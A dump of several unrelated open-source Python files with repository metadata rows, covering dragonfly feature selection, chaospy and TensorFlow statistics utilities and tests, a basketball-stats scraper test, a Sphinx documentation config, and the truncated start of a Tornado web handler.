if method not in ['linear','random','quadraic','sinusoidal']:
raise ValueError(f"method accepts only linear,random,quadraic types ")
def fit(self,model,X_train,y_train,X_valid,y_valid,method='sinusoidal',verbose=True):
"""
Dragon Fly Optimization
Parameters
----------
model :
machine learning model's object
X_train : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Training input samples to be used for machine learning model
y_train : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
X_valid : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Validation input samples
y_valid : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
method : {'linear','random','quadraic','sinusoidal'}, default='sinusoidal'
Choose the between the three methods of Dragon Fly optimization
verbose : bool,default=True
Print results for iterations
"""
self._check_params(model,X_train,y_train,X_valid,y_valid,method)
kbest=self.population_size-1
self.feature_list=np.array(list(X_train.columns))
self.best_results_per_iteration={}
self.best_score=np.inf
self.worst_score=-np.inf
self.worst_dim=np.ones(X_train.shape[1])
self.best_dim=np.ones(X_train.shape[1])
self.best_score_dimension=np.ones(X_train.shape[1])
delta_x=np.random.randint(0,2,size=(self.population_size,X_train.shape[1]))
self.initialize_population(X_train)
for i in range(self.n_iteration):
self._check_individuals()
self.fitness_scores=self.evaluate_fitness(model,X_train,y_train,X_valid,y_valid)
#if not(self.minimize):
# self.fitness_scores=list(-np.array(self.fitness_scores))
self.iteration_objective_score_monitor(i)
if method=='linear':
s=0.2-(0.2*((i+1)/self.n_iteration))
e=0.1-(0.1*((i+1)/self.n_iteration))
a=0.0+(0.2*((i+1)/self.n_iteration))
c=0.0+(0.2*((i+1)/self.n_iteration))
f=0.0+(2*((i+1)/self.n_iteration))
w=0.9-(i+1)*(0.5)/(self.n_iteration)
if method=='random':
if 2*(i+1)<=self.n_iteration:
pct=0.1-(0.2*(i+1)/self.n_iteration)
else:
pct=0
w=0.9-(i+1)*(0.5)/(self.n_iteration)
s=2*np.random.random()*pct
a=2*np.random.random()*pct
c=2*np.random.random()*pct
f=2*np.random.random()
e=pct
if method=='quadraic':
w=0.9-(i+1)*(0.5)/(self.n_iteration)
s=0.2-(0.2*((i+1)/self.n_iteration))**2
e=0.1-(0.1*((i+1)/self.n_iteration))**2
a=0.0+(0.2*((i+1)/self.n_iteration))**2
c=0.0+(0.2*((i+1)/self.n_iteration))**2
f=0.0+(2*(i+1)/self.n_iteration)**2
if method=='sinusoidal':
beta=0.5
w=0.9-(i+1)*(0.5)/(self.n_iteration)
s=0.10+0.10*np.abs( np.cos( ((i+1)/self.n_iteration)*(4*np.pi-beta*np.pi)) )
e=0.05+0.05*np.abs( np.cos( ((i+1)/self.n_iteration)*(4*np.pi-beta*np.pi)) )
a=0.10-0.05*np.abs( np.cos( ((i+1)/self.n_iteration)*(4*np.pi-beta*np.pi)) )
c=0.10-0.05*np.abs( np.cos( ((i+1)/self.n_iteration)*(4*np.pi-beta*np.pi)) )
f=2-1*np.abs( np.cos( ((i+1)/self.n_iteration)*(4*np.pi-beta*np.pi)) )
temp=individuals=self.individuals
temp_2=(( (temp.reshape(temp.shape[0],1,temp.shape[1])-temp.reshape(1,temp.shape[0],temp.shape[1])).reshape(temp.shape[0]**2,temp.shape[1])**2) )
temp_3=temp_2.reshape(temp.shape[0],temp.shape[0],temp.shape[1]).sum(axis=2)
zz=np.argsort(temp_3)
cc=[ list(iter1[iter1!=iter2]) for iter1,iter2 in zip(zz,np.arange(temp.shape[0])) ]
Si=-(np.repeat(individuals,kbest,axis=0).reshape(individuals.shape[0],kbest,individuals.shape[1])-individuals[np.array(cc)[:,:kbest]]).sum(axis=1)
Ai=delta_x[np.array(cc)[:,:kbest]].sum(axis=1)/kbest
Ci=(individuals[np.array(cc)[:,:kbest]].sum(axis=1)/kbest)-individuals
Fi=self.best_score_dimension-self.individuals
Ei=self.individuals+self.worst_dim
delta_x=s*Si+a*Ai+c*Ci+f*Fi+e*Ei+w*delta_x
delta_x=np.where(delta_x>6,6,delta_x)
delta_x=np.where(delta_x<-6,-6,delta_x)
T=abs(delta_x/np.sqrt(1+delta_x**2))
self.individuals=np.where(np.random.uniform(size=(self.population_size,X_train.shape[1]))<T,np.logical_not(self.individuals).astype(int),individuals)
self.verbose_results(verbose,i)
self.best_feature_list=list(self.feature_list[np.where(self.best_dim)[0]])
return self.best_feature_list
| 45.636905 | 161 | 0.589018 |
ab6a5a018d17bea76d1611f7e1b8a162e26e3f07 | 2,107 | py | Python | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | 1 | 2020-04-29T20:53:25.000Z | 2020-04-29T20:53:25.000Z | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | null | null | null | chaospy/descriptives/quantity_of_interest.py | agonzs11/Polinomio-del-caos | 5a415ece07e6535488174bac69a6c0fcc2ca272d | [
"MIT"
] | null | null | null | import numpy
from .. import distributions, poly as polynomials
from ..external import SampleDist
def QoI_Dist(poly, dist, sample=10000, **kws):
"""
Constructs distributions for the quantity of interests.
The function constructs a kernel density estimator (KDE) for each
polynomial (poly) by sampling it. With the KDEs, distributions (Dists) are
constructed. The Dists can be used for e.g. plotting probability density
functions (PDF), or to make a second uncertainty quantification simulation
with that newly generated Dists.
Args:
poly (chaospy.poly.ndpoly):
Polynomial of interest.
dist (Dist):
Defines the space where the samples for the KDE is taken from the
poly.
sample (int):
Number of samples used in estimation to construct the KDE.
Returns:
(numpy.ndarray):
The constructed quantity of interest (QoI) distributions, where
``qoi_dists.shape==poly.shape``.
Examples:
>>> dist = chaospy.Normal(0, 1)
>>> x = chaospy.variable(1)
>>> poly = chaospy.polynomial([x])
>>> qoi_dist = chaospy.QoI_Dist(poly, dist)
>>> values = qoi_dist[0].pdf([-0.75, 0., 0.75])
>>> values.round(8)
array([0.29143037, 0.39931708, 0.29536329])
"""
shape = poly.shape
poly = poly.flatten()
dim = len(dist)
#sample from the inumpyut dist
samples = dist.sample(sample, **kws)
qoi_dists = []
for i in range(0, len(poly)):
#sample the polynomial solution
if dim == 1:
dataset = poly[i](samples)
else:
dataset = poly[i](*samples)
lo = dataset.min()
up = dataset.max()
#creates qoi_dist
qoi_dist = SampleDist(dataset, lo, up)
qoi_dists.append(qoi_dist)
#reshape the qoi_dists to match the shape of the inumpyut poly
qoi_dists = numpy.array(qoi_dists, distributions.Dist)
qoi_dists = qoi_dists.reshape(shape)
if not shape:
qoi_dists = qoi_dists.item()
return qoi_dists
| 30.1 | 79 | 0.619364 |
b5d041c8c768aa936280fc7e3b3ce1c0ff239740 | 11,301 | py | Python | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | toptaldev92/tensorflow | 1fd1f65d1b0896149e44a1f105267c27994010d9 | [
"Apache-2.0"
] | 2 | 2019-07-05T15:17:01.000Z | 2020-04-16T07:25:56.000Z | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | kiliczsh/tensorflow | f49aca4532c155597c669cf2189f211cafbebf96 | [
"Apache-2.0"
] | 1 | 2021-04-12T03:51:59.000Z | 2021-04-12T03:51:59.000Z | tensorflow/contrib/distributions/python/kernel_tests/distribution_util_test.py | kiliczsh/tensorflow | f49aca4532c155597c669cf2189f211cafbebf96 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:17:52.000Z | 2021-04-22T09:17:52.000Z | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import special
import tensorflow as tf
from tensorflow.contrib.distributions.python.ops import distribution_util
class DistributionUtilTest(tf.test.TestCase):
def testAssertCloseIntegerDtype(self):
x = [1, 5, 10, 15, 20]
y = x
z = [2, 5, 10, 15, 20]
with self.test_session():
with tf.control_dependencies([distribution_util.assert_close(x, y)]):
tf.identity(x).eval()
with tf.control_dependencies([distribution_util.assert_close(y, x)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(x, z)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(y, z)]):
tf.identity(y).eval()
def testAssertCloseNonIntegerDtype(self):
x = np.array([1., 5, 10, 15, 20], dtype=np.float32)
y = x + 1e-8
z = [2., 5, 10, 15, 20]
with self.test_session():
with tf.control_dependencies([distribution_util.assert_close(x, y)]):
tf.identity(x).eval()
with tf.control_dependencies([distribution_util.assert_close(y, x)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(x, z)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(y, z)]):
tf.identity(y).eval()
def testAssertCloseEpsilon(self):
x = [0., 5, 10, 15, 20]
# x != y
y = [0.1, 5, 10, 15, 20]
# x = z
z = [1e-8, 5, 10, 15, 20]
with self.test_session():
with tf.control_dependencies([distribution_util.assert_close(x, z)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(x, y)]):
tf.identity(x).eval()
with self.assertRaisesOpError("Condition x ~= y"):
with tf.control_dependencies([distribution_util.assert_close(y, z)]):
tf.identity(y).eval()
def testAssertIntegerForm(self):
# This should only be detected as an integer.
x = [1., 5, 10, 15, 20]
y = [1.1, 5, 10, 15, 20]
# First component isn't less than float32.eps = 1e-7
z = [1.0001, 5, 10, 15, 20]
# This shouldn"t be detected as an integer.
w = [1e-8, 5, 10, 15, 20]
with self.test_session():
with tf.control_dependencies([distribution_util.assert_integer_form(x)]):
tf.identity(x).eval()
with self.assertRaisesOpError("x has non-integer components"):
with tf.control_dependencies([
distribution_util.assert_integer_form(y)]):
tf.identity(y).eval()
with self.assertRaisesOpError("x has non-integer components"):
with tf.control_dependencies([
distribution_util.assert_integer_form(z)]):
tf.identity(z).eval()
with self.assertRaisesOpError("x has non-integer components"):
with tf.control_dependencies([
distribution_util.assert_integer_form(w)]):
tf.identity(w).eval()
def testGetLogitsAndProbImproperArguments(self):
with self.test_session():
with self.assertRaises(ValueError):
distribution_util.get_logits_and_prob(logits=None, p=None)
with self.assertRaises(ValueError):
distribution_util.get_logits_and_prob(logits=[0.1], p=[0.1])
def testGetLogitsAndProbLogits(self):
p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)
logits = special.logit(p)
with self.test_session():
new_logits, new_p = distribution_util.get_logits_and_prob(
logits=logits, validate_args=True)
self.assertAllClose(p, new_p.eval())
self.assertAllClose(logits, new_logits.eval())
def testGetLogitsAndProbLogitsMultidimensional(self):
p = np.array([0.2, 0.3, 0.5], dtype=np.float32)
logits = np.log(p)
with self.test_session():
new_logits, new_p = distribution_util.get_logits_and_prob(
logits=logits, multidimensional=True, validate_args=True)
self.assertAllClose(new_p.eval(), p)
self.assertAllClose(new_logits.eval(), logits)
def testGetLogitsAndProbProbability(self):
p = np.array([0.01, 0.2, 0.5, 0.7, .99], dtype=np.float32)
with self.test_session():
new_logits, new_p = distribution_util.get_logits_and_prob(
p=p, validate_args=True)
self.assertAllClose(special.logit(p), new_logits.eval())
self.assertAllClose(p, new_p.eval())
def testGetLogitsAndProbProbabilityMultidimensional(self):
p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)
with self.test_session():
new_logits, new_p = distribution_util.get_logits_and_prob(
p=p, multidimensional=True, validate_args=True)
self.assertAllClose(np.log(p), new_logits.eval())
self.assertAllClose(p, new_p.eval())
def testGetLogitsAndProbProbabilityValidateArgs(self):
p = [0.01, 0.2, 0.5, 0.7, .99]
# Component less than 0.
p2 = [-1, 0.2, 0.5, 0.3, .2]
# Component greater than 1.
p3 = [2, 0.2, 0.5, 0.3, .2]
with self.test_session():
_, prob = distribution_util.get_logits_and_prob(p=p, validate_args=True)
prob.eval()
with self.assertRaisesOpError("Condition x >= 0"):
_, prob = distribution_util.get_logits_and_prob(
p=p2, validate_args=True)
prob.eval()
_, prob = distribution_util.get_logits_and_prob(p=p2, validate_args=False)
prob.eval()
with self.assertRaisesOpError("p has components greater than 1"):
_, prob = distribution_util.get_logits_and_prob(
p=p3, validate_args=True)
prob.eval()
_, prob = distribution_util.get_logits_and_prob(p=p3, validate_args=False)
prob.eval()
def testGetLogitsAndProbProbabilityValidateArgsMultidimensional(self):
p = np.array([[0.3, 0.4, 0.3], [0.1, 0.5, 0.4]], dtype=np.float32)
# Component less than 0. Still sums to 1.
p2 = np.array([[-.3, 0.4, 0.9], [0.1, 0.5, 0.4]], dtype=np.float32)
# Component greater than 1. Does not sum to 1.
p3 = np.array([[1.3, 0.0, 0.0], [0.1, 0.5, 0.4]], dtype=np.float32)
# Does not sum to 1.
p4 = np.array([[1.1, 0.3, 0.4], [0.1, 0.5, 0.4]], dtype=np.float32)
with self.test_session():
_, prob = distribution_util.get_logits_and_prob(
p=p, multidimensional=True)
prob.eval()
with self.assertRaisesOpError("Condition x >= 0"):
_, prob = distribution_util.get_logits_and_prob(
p=p2, multidimensional=True, validate_args=True)
prob.eval()
_, prob = distribution_util.get_logits_and_prob(
p=p2, multidimensional=True, validate_args=False)
prob.eval()
with self.assertRaisesOpError(
"(p has components greater than 1|p does not sum to 1)"):
_, prob = distribution_util.get_logits_and_prob(
p=p3, multidimensional=True, validate_args=True)
prob.eval()
_, prob = distribution_util.get_logits_and_prob(
p=p3, multidimensional=True, validate_args=False)
prob.eval()
with self.assertRaisesOpError("p does not sum to 1"):
_, prob = distribution_util.get_logits_and_prob(
p=p4, multidimensional=True, validate_args=True)
prob.eval()
_, prob = distribution_util.get_logits_and_prob(
p=p4, multidimensional=True, validate_args=False)
prob.eval()
def testLogCombinationsBinomial(self):
n = [2, 5, 12, 15]
k = [1, 2, 4, 11]
log_combs = np.log(special.binom(n, k))
with self.test_session():
n = np.array(n, dtype=np.float32)
counts = [[1., 1], [2., 3], [4., 8], [11, 4]]
log_binom = distribution_util.log_combinations(n, counts)
self.assertEqual([4], log_binom.get_shape())
self.assertAllClose(log_combs, log_binom.eval())
def testLogCombinationsShape(self):
# Shape [2, 2]
n = [[2, 5], [12, 15]]
with self.test_session():
n = np.array(n, dtype=np.float32)
# Shape [2, 2, 4]
counts = [[[1., 1, 0, 0], [2., 2, 1, 0]], [[4., 4, 1, 3], [10, 1, 1, 4]]]
log_binom = distribution_util.log_combinations(n, counts)
self.assertEqual([2, 2], log_binom.get_shape())
def _np_rotate_transpose(self, x, shift):
if not isinstance(x, np.ndarray):
x = np.array(x)
return np.transpose(x, np.roll(np.arange(len(x.shape)), shift))
def testRollStatic(self):
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "None values not supported."):
distribution_util.rotate_transpose(None, 1)
for x in (np.ones(1), np.ones((2, 1)), np.ones((3, 2, 1))):
for shift in np.arange(-5, 5):
y = distribution_util.rotate_transpose(x, shift)
self.assertAllEqual(self._np_rotate_transpose(x, shift),
y.eval())
self.assertAllEqual(np.roll(x.shape, shift),
y.get_shape().as_list())
def testRollDynamic(self):
with self.test_session() as sess:
x = tf.placeholder(tf.float32)
shift = tf.placeholder(tf.int32)
for x_value in (np.ones(1, dtype=x.dtype.as_numpy_dtype()),
np.ones((2, 1), dtype=x.dtype.as_numpy_dtype()),
np.ones((3, 2, 1), dtype=x.dtype.as_numpy_dtype())):
for shift_value in np.arange(-5, 5):
self.assertAllEqual(
self._np_rotate_transpose(x_value, shift_value),
sess.run(distribution_util.rotate_transpose(x, shift),
feed_dict={x: x_value, shift: shift_value}))
def testChooseVector(self):
with self.test_session():
x = np.arange(10, 12)
y = np.arange(15, 18)
self.assertAllEqual(
x, distribution_util.pick_vector(
tf.less(0, 5), x, y).eval())
self.assertAllEqual(
y, distribution_util.pick_vector(
tf.less(5, 0), x, y).eval())
self.assertAllEqual(
x, distribution_util.pick_vector(
tf.constant(True), x, y)) # No eval.
self.assertAllEqual(
y, distribution_util.pick_vector(
tf.constant(False), x, y)) # No eval.
if __name__ == "__main__":
tf.test.main()
| 36.931373 | 80 | 0.637377 |
192df4ac7d4b320dbd5a89a50bbadbd326738208 | 1,227 | py | Python | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 325 | 2015-10-27T03:15:49.000Z | 2022-03-16T06:49:12.000Z | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 173 | 2018-10-16T04:11:05.000Z | 2022-03-29T17:52:08.000Z | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 97 | 2016-04-09T19:11:28.000Z | 2022-03-21T09:57:50.000Z | from unittest import TestCase
from unittest.mock import MagicMock
from basketball_reference_web_scraper.html import PlayerSeasonBoxScoresTable, PlayerSeasonBoxScoresRow
class TestPlayerSeasonBoxScoresTable(TestCase):
def setUp(self):
self.html = MagicMock()
def test_rows_query(self):
self.assertEqual(
'//tbody/tr[not(contains(@class, "thead"))]',
PlayerSeasonBoxScoresTable(html=self.html).rows_query,
)
def test_rows_returns_empty_array_when_there_are_not_any_matching_rows(self):
self.html.xpath = MagicMock(return_value=[])
self.assertListEqual([], PlayerSeasonBoxScoresTable(html=self.html).rows)
def test_rows_returns_populated_array_when_there_are_matching_rows(self):
first_row_html = MagicMock(name="first matching row html")
second_row_html = MagicMock(name="second matching row html")
self.html.xpath = MagicMock(return_value=[first_row_html, second_row_html])
self.assertListEqual([
PlayerSeasonBoxScoresRow(html=first_row_html),
PlayerSeasonBoxScoresRow(html=second_row_html),
],
PlayerSeasonBoxScoresTable(html=self.html).rows,
)
| 39.580645 | 102 | 0.717196 |
4ceb9cfdb1f68aaf5d3b8b8d51f43e192da3501e | 11,178 | py | Python | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# PypeIt documentation build configuration file, created by
# sphinx-quickstart on Fri Nov 13 13:39:35 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from pkg_resources import get_distribution
# Get configuration information from setup.cfg
from configparser import ConfigParser
conf = ConfigParser()
conf.read([os.path.join(os.path.dirname(__file__), '..', 'setup.cfg')])
setup_cfg = dict(conf.items('metadata'))
#
## If extensions (or modules to document with autodoc) are in another directory,
## add these directories to sys.path here. If the directory is relative to the
## documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('../pypeit'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx_automodapi.automodapi',
'sphinx.ext.napoleon',
'sphinx.ext.doctest',
'sphinx.ext.graphviz',
'sphinx.ext.inheritance_diagram',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.autosectionlabel',
]
# Nicer math rendering than sphinx default?
# mathjax_path='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML'
#automodapi
numpydoc_show_class_members = False
# Napoleon settings
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Autosection
autosectionlabel_prefix_document = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PypeIt'
copyright = u'2020, Prochaska, Hennawi, Cooke, and Associates'
author = u'Prochaska, Hennawi, Cooke, and Associates'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The full version, including alpha/beta/rc tags.
release = get_distribution(setup_cfg['name']).version
# The short X.Y.Z version.
version = '.'.join(release.split('.')[:3])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'include/*.rst', 'help/*.rst']
# When nit-picking, ignore these warnings:
nitpick_ignore = [ ('py:class', 'optional'),
('py:class', 'array-like'),
('py:class', 'scalar-like'),
('py:class', 'default') ]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'lovelace'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# TODO: I think I prefer this theme; bizstyle would be my second choice
html_theme = 'sphinx_rtd_theme'
#html_theme = 'sphinxdoc'
#html_theme = 'bizstyle'
#html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%m %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['localtoc.html', 'globaltoc.html', 'relations.html', 'sourcelink.html']
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PypeItdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PypeIt.tex', u'PypeIt Documentation',
u'Cooke, Prochaska, and Associates', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pypeit', u'PypeIt Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PypeIt', u'PypeIt Documentation',
author, 'PypeIt', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| 32.213256 | 104 | 0.71927 |
ef958845d70e683f6818234a3c71540e85e9aa81 | 26,858 | py | Python | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 1 | 2021-09-14T19:45:53.000Z | 2021-09-14T19:45:53.000Z | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 3 | 2022-02-28T14:37:36.000Z | 2022-03-31T14:31:05.000Z | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 1 | 2021-09-16T14:30:34.000Z | 2021-09-16T14:30:34.000Z | #!/usr/local/bin/python3
# coding: utf-8
# YYeTsBot - handler.py
# 6/16/21 20:30
#
__author__ = "Benny <benny.think@gmail.com>"
import contextlib
import importlib
import json
import logging
import os
import re
import sys
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from datetime import date, timedelta
from hashlib import sha1
from http import HTTPStatus
import filetype
from tornado import escape, gen, web
from tornado.concurrent import run_on_executor
from database import AntiCrawler, CaptchaResource, Redis
escape.json_encode = lambda value: json.dumps(value, ensure_ascii=False)
logging.basicConfig(level=logging.INFO)
if getattr(sys, '_MEIPASS', None):
adapter = "SQLite"
else:
adapter = "Mongo"
logging.info("%s Running with %s. %s", "#" * 10, adapter, "#" * 10)
static_path = os.path.join(os.path.dirname(__file__), 'templates')
index = os.path.join(static_path, "index.html")
class BaseHandler(web.RequestHandler):
executor = ThreadPoolExecutor(200)
class_name = f"Fake{adapter}Resource"
adapter_module = importlib.import_module(f"{adapter}")
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
self.json = {}
with contextlib.suppress(ValueError):
self.json: dict = json.loads(self.request.body)
self.instance = getattr(self.adapter_module, self.class_name)()
def write_error(self, status_code, **kwargs):
if status_code in [HTTPStatus.FORBIDDEN,
HTTPStatus.INTERNAL_SERVER_ERROR,
HTTPStatus.UNAUTHORIZED,
HTTPStatus.NOT_FOUND]:
self.write(str(kwargs.get('exc_info')))
def data_received(self, chunk):
pass
def get_current_user(self) -> str:
username = self.get_secure_cookie("username") or b""
return username.decode("u8")
class TopHandler(BaseHandler):
class_name = f"Top{adapter}Resource"
# from Mongo import TopMongoResource
